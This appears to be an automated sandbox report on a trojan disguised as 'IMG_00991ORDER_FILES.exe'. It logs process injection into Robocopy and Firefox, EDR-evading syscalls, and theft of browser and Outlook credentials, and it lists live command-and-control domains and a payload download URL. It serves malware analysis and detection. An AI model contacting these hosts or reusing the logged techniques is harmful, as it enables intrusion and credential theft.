        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtResumeThread: Direct from: 0x77E635CCJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtWriteVirtualMemory: Direct from: 0x77E62D5CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtDelayExecution: Direct from: 0x77E62CFCJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtWriteVirtualMemory: Direct from: 0x77E6482CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtCreateUserProcess: Direct from: 0x77E6363CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtProtectVirtualMemory: Direct from: 0x77E62EBCJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtQueryInformationProcess: Direct from: 0x77E62B46Jump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtResumeThread: Direct from: 0x77E62EDCJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtOpenKeyEx: Direct from: 0x77E62ABCJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtQueryAttributesFile: Direct from: 0x77E62D8CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtCreateKey: Direct from: 0x77E62B8CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtSetInformationThread: Direct from: 0x77E62A6CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtClose: Direct from: 0x77E62A8C
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtAllocateVirtualMemory: Direct from: 0x77E6480CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtProtectVirtualMemory: Direct from: 0x77E57A4EJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtAllocateVirtualMemory: Direct from: 0x77E62B0CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtOpenSection: Direct from: 0x77E62D2CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtQueryVolumeInformationFile: Direct from: 0x77E62E4CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtDeviceIoControlFile: Direct from: 0x77E62A0CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtQuerySystemInformation: Direct from: 0x77E647ECJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtCreateFile: Direct from: 0x77E62F0CJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: NULL target: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: NULL target: C:\Windows\SysWOW64\Robocopy.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeThread register set: target process: 4124Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeThread APC queued: target process: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeProcess created: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"Jump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        1
        OS Credential Dumping
        121
        Security Software Discovery
        Remote Services1
        Email Collection
        1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
        Process Injection
        2
        Virtualization/Sandbox Evasion
        LSASS Memory2
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism
        1
        Access Token Manipulation
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading
        311
        Process Injection
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture4
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism
        Cached Domain Credentials13
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499873 Sample: IMG_00991ORDER_FILES.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 38 www.tmglift.xyz 2->38 40 www.vlyra.online 2->40 42 25 other IPs or domains 2->42 54 Suricata IDS alerts for network traffic 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Multi AV Scanner detection for submitted file 2->58 62 3 other signatures 2->62 10 IMG_00991ORDER_FILES.exe 1 40 2->10         started        signatures3 60 Performs DNS queries to domains with low reputation 38->60 process4 file5 30 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 10->30 dropped 32 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 10->32 dropped 34 C:\Users\user\AppData\Local\...\UserInfo.dll, PE32 10->34 dropped 36 2 other files (none is malicious) 10->36 dropped 74 Switches to a custom stack to bypass stack traces 10->74 14 IMG_00991ORDER_FILES.exe 6 10->14         started        signatures6 process7 dnsIp8 50 kapiextra.com 23.111.141.202, 49806, 80 HVC-ASUS United States 14->50 76 Maps a DLL or memory area into another process 14->76 18 DRCZnsuCMood.exe 14->18 injected signatures9 process10 signatures11 52 Found direct / indirect Syscall (likely to bypass EDR) 18->52 21 Robocopy.exe 13 18->21         started        process12 signatures13 64 Tries to steal Mail credentials (via file / registry access) 21->64 66 Tries to harvest and steal browser information (history, passwords, etc) 21->66 68 Modifies the context of a thread in another process (thread injection) 21->68 70 3 other signatures 21->70 24 DRCZnsuCMood.exe 21->24 injected 28 firefox.exe 21->28         started        process14 dnsIp15 44 www.vlyra.online 203.161.42.73, 49812, 49813, 49814 VNPT-AS-VNVNPTCorpVN Malaysia 24->44 46 bola88site.one 172.96.191.39, 49836, 49837, 49838 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada 24->46 48 10 other IPs or domains 24->48 72 Found direct / indirect Syscall (likely to bypass EDR) 24->72 signatures16

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        IMG_00991ORDER_FILES.exe26%ReversingLabsWin32.Trojan.Generic
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsn2852.tmp\UserInfo.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsDialogs.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsExec.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.indeks.space/1fqp/0%Avira URL Cloudsafe
        http://www.policydetails.online/w4ze/0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.at8l4.shop/euco/0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://www.vlyra.online/evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.tmglift.xyz/fu44/0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        http://www.tyai36.top/7te8/0%Avira URL Cloudsafe
        http://www.tmglift.xyz/fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.kapiextra.com/wRdZDseACWW137.bin0%Avira URL Cloudsafe
        http://www.kapiextra.com/wRdZDseACWW137.binT0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.theaji.shop/q3za/?AvLLLbOh=RWnANPBTnIHygAxj+74p2fQt/r+QMu+ZbRPK+z1nLy5TPZ7mlunYNOVzlFQ68L6IsvBO8bEu8tkdQ9B+wYsoyn5BHOSzYZ2Hj+i3Yz8xBJ+jGbXNJ7HrFvE=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.kapiextra.com/wRdZDseACWW137.binX0%Avira URL Cloudsafe
        http://www.bola88site.one/frol/0%Avira URL Cloudsafe
        http://www.dom-2.online/i0bg/?AvLLLbOh=bQKVVFfanjNZBfdcIZop/p51Kq/q4DLd8P4GjEmXCojBwWm3h7h09nlNydz6D8la1AjIsgIaNvk5Cs0Spg0Y+chR33DfPPxX8Qm8eqAyl/PDJccbAQNQv5M=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.tyai36.top/7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.bola88site.one/frol/?AvLLLbOh=YNeTF4pSv4+M6gG3KqO7busQPotc22z/OB6yhtk01jUCobC9Y52Gmw3Z99Ir4kEoVNEa+n0iDPzrnsm9kM3Fz3qyLYlg0011pg2PCcWBraIo86SjG5d0+YE=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.policydetails.online/w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs=0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.at8l4.shop/euco/?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.23ddv.top/y2fc/0%Avira URL Cloudsafe
        http://www.dom-2.online/i0bg/0%Avira URL Cloudsafe
        http://www.23ddv.top/y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.gyver.cloud/7arp/0%Avira URL Cloudsafe
        http://www.indeks.space/1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ=0%Avira URL Cloudsafe
        http://www.kiristyle.shop/x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.kiristyle.shop/x85c/0%Avira URL Cloudsafe
        http://www.theaji.shop/q3za/0%Avira URL Cloudsafe
        http://www.gyver.cloud/7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG80%Avira URL Cloudsafe
        http://www.kapiextra.com/wRdZDseACWW137.bin40%Avira URL Cloudsafe
        http://www.vlyra.online/evtw/0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        tyai36.top
        38.47.207.120
        truetrue
          unknown
          kapiextra.com
          23.111.141.202
          truefalse
            unknown
            at8l4.shop
            3.33.130.190
            truetrue
              unknown
              bola88site.one
              172.96.191.39
              truetrue
                unknown
                www.indeks.space
                194.58.112.174
                truetrue
                  unknown
                  www.theaji.shop
                  3.82.56.39
                  truetrue
                    unknown
                    natroredirect.natrocdn.com
                    85.159.66.93
                    truetrue
                      unknown
                      shops.vipshopbuy.com
                      35.244.245.121
                      truefalse
                        unknown
                        policydetails.online
                        148.135.49.178
                        truetrue
                          unknown
                          23ddv.top
                          154.23.184.218
                          truetrue
                            unknown
                            www.dom-2.online
                            199.59.243.226
                            truetrue
                              unknown
                              gyver.cloud
                              76.223.67.189
                              truetrue
                                unknown
                                www.vlyra.online
                                203.161.42.73
                                truetrue
                                  unknown
                                  www.tmglift.xyz
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.23ddv.top
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.ayna-pro.shop
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.esistiliya.online
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.tyai36.top
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.kapiextra.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.bola88site.one
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.at8l4.shop
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.policydetails.online
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.gyver.cloud
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.terrearcenciel.online
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.950021.com
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          www.kiristyle.shop
                                                          unknown
                                                          unknowntrue
                                                            unknown
                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.at8l4.shop/euco/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.tyai36.top/7te8/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.policydetails.online/w4ze/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.tmglift.xyz/fu44/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.tmglift.xyz/fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.indeks.space/1fqp/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.vlyra.online/evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.theaji.shop/q3za/?AvLLLbOh=RWnANPBTnIHygAxj+74p2fQt/r+QMu+ZbRPK+z1nLy5TPZ7mlunYNOVzlFQ68L6IsvBO8bEu8tkdQ9B+wYsoyn5BHOSzYZ2Hj+i3Yz8xBJ+jGbXNJ7HrFvE=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.bola88site.one/frol/?AvLLLbOh=YNeTF4pSv4+M6gG3KqO7busQPotc22z/OB6yhtk01jUCobC9Y52Gmw3Z99Ir4kEoVNEa+n0iDPzrnsm9kM3Fz3qyLYlg0011pg2PCcWBraIo86SjG5d0+YE=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.kapiextra.com/wRdZDseACWW137.binfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.bola88site.one/frol/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.dom-2.online/i0bg/?AvLLLbOh=bQKVVFfanjNZBfdcIZop/p51Kq/q4DLd8P4GjEmXCojBwWm3h7h09nlNydz6D8la1AjIsgIaNvk5Cs0Spg0Y+chR33DfPPxX8Qm8eqAyl/PDJccbAQNQv5M=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.tyai36.top/7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.policydetails.online/w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs=true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.dom-2.online/i0bg/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.indeks.space/1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ=true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.at8l4.shop/euco/?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.23ddv.top/y2fc/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.kiristyle.shop/x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.gyver.cloud/7arp/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.23ddv.top/y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.kiristyle.shop/x85c/false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.theaji.shop/q3za/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.gyver.cloud/7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.vlyra.online/evtw/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmpfalse
